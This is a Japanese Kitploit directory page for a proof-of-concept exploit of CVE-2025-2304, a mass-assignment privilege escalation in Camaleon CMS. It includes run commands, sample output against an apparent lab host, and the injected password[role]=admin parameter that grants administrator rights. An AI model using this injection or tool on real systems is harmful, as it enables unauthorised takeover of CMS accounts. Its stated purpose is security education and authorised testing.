Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-2304-PoC — Camaleon CMS における CVE-2025-2304 権限昇格の PoC | Kitploit
ツール/GitHubGitHub/lil0xplorer/cve-2025-2304-poc
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHublil0xplorer/cve-2025-2304-poc

CVE-2025-2304-PoC

Camaleon CMS における CVE-2025-2304 権限昇格の PoC

リポジトリを見る
17ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-2304 エクスプロイト

Camaleon CMS は Mass Assignment による権限昇格に対して脆弱です

脆弱性の説明

Camaleon CMS には、Mass Assignment による権限昇格の脆弱性が存在します。

ユーザーがパスワードを変更したい場合、UsersController の 'updated_ajax' メソッドが呼び出されます。この脆弱性は、すべてのパラメータをフィルタリングなしで通過させる危険な permit! メソッドの使用に起因します。

必要条件

root@kitploit:~
pip install requests beautifulsoup4

使用方法

root@kitploit:~
python exploit.py --url http://target.com -u username -p password

引数

  • --url - 脆弱なアプリケーションのベース URL
  • -u - 認証用のユーザー名
  • -p - 認証用のパスワード

使用例

root@kitploit:~
python exploit.py --url http://facts.htb -u krrish -p krrish

出力:

root@kitploit:~
[*] Logging in as krrish...
[*] Exploiting...
[+] Exploited! You're admin now

動作の仕組み

  1. 提供された認証情報で認証します
  2. 注入された password[role]=admin パラメータを含むパスワード更新リクエストを送信します
  3. ユーザーの権限を管理者に昇格させます

免責事項

このツールは、教育および許可されたセキュリティテストの目的のみで使用されます。コンピュータシステムへの不正アクセスは違法です。

作者

https://x.com/krrishbhurani

https://www.linkedin.com/in/krrish-bhurani/

ツールをダウンロード